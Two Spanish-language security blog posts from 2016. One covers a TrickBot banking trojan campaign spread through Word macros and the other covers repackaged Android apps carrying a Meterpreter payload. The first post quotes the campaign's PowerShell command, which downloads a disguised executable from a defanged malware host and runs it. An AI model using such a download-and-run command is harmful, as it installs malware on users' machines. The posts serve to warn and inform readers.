martes, 29 de noviembre de 2016

Continúan las andanzas de Trickbot

Hasta ahora encontrábamos el troyano bancario TrickBot como un binario aislado, pero abandona su comportamiento para seguir un modus operandi más habitual de éste tipo de amenazas. Además, cabe destacar que a pesar de comenzar en Australia y avanzar cruzar el charco hasta Europa, esta vez ha llegado a Canadá.

Captura del documento de Word que solicita habilitar el contenido


Esta vez, encontramos un documento de Word el cual nos pide que habilitemos la edición y el contenido, de esta manera permitiendo que se ejecuten las macros incluidas dentro del documento de Word.

Esta macro, lanza a través de Powershell la descarga de un archivo remoto .png, que a pesar de su extensión no es una imagen...

PowerShell (New-Object System.Net.WebClient).DownloadFile('hxxp://wingsbiotech.com/kufma/sdogsodngsdlk.png','C:\Users\xxxxx\AppData\Local\Temp\scpsis.exe');Start-process 'C:\Users\xxxxx\AppData\Local\Temp\scpsis.exe';

Tras la descarga de la falsa iagen ".png", se almacena en %temp% para posteriormente ser ejecutado con una llamada a start-process


Una vez lograda la infección, comienza a conectarse a servidores remotos para descargar la configuración necesaria para su funcionamiento (tal y como vimos en la anterior una-al-día).

Esta vez, además de a los clientes de las entidades ya mencionadas se suman a la lista de afectados Santander UK y a BMO, conocido como "Bank of Montreal" (Canadá).

Recuerda que si recibes un documento por parte de un desconocido no debes abrirlo. A esto debemos añadir, que no se deben habilitar posibles ejecuciones de contenido en documentos de Office cuando el destinatario de este es desconocido, para evitar este tipo de amenazas.

Más información:

una-al-dia (07/11/2016) El troyano bancario TrickBot azota a Europa
  


Fernando Díaz

miércoles, 23 de noviembre de 2016

Las apariencias engañan

Una de las técnicas más habituales del malware para lograr la infección es hacerse pasar por aplicaciones normales y de utilidad para el usuario. Vamos a analizar dos aplicaciones que en principio pueden parecer inofensivas, pero que después incluyen un elemento bastante peligroso que veremos a continuación.

Las dos aplicaciones que nos ocupan en esta ocasión son las siguientes:


A primera vista, parecen una aplicación de aprendizaje de C++ y otra para trámites bancarios respectivamente. Y en efecto, lo son:




¿Qué elemento peligroso nos encontramos? Las aplicaciones al pasar por los escáneres antivirus parecen limpias, sin ningún signo de peligro:



Pero encontramos lo siguiente: ambas aplicaciones contienen una payload de Meterpreter. 

Para los que lo desconozcan: 

"Meterpreter es un Payload que se ejecuta después del proceso de explotación o abuso de una vulnerabilidad en un sistema operativo, meterpreter es el diminutivo para meta-interprete y se ejecuta completamente en memoria; evitando así tener problemas con los Antivirus."

Lo que ha ocurrido en esta situación es que se ha utilizado una herramienta para infectar aplicaciones de Android utilizando los propios permisos de la aplicación y de esta manera evitar la detección de los antivirus, incluso se pueden añadir permisos nuevos. Concretamente, hacen uso de esta inyección de código; https://github.com/sensepost/kwetza

Listado de posibles permisos añadidos...

Si miramos mas a fondo la aplicación, encontramos que algo no cuadra...


Miramos por encima el smali de la activity... 


Y efectivamente, verificamos que incluye dicho payload. Mucho más sorprendente si recordamos que habían pasado como inofensivas ante los escáneres antivirus. Esto ocurre en ambas aplicaciones, que a pesar de ser oficiales re-empaquetadas, cuentan con código modificado y no se distribuyen por markets oficiales como Google Play

Una vez más, recordamos la necesidad de evitar la descarga desde markets no oficiales o de webs de dudosa fiabilidad, para evitar este tipo de infecciones. 




Fernando Díaz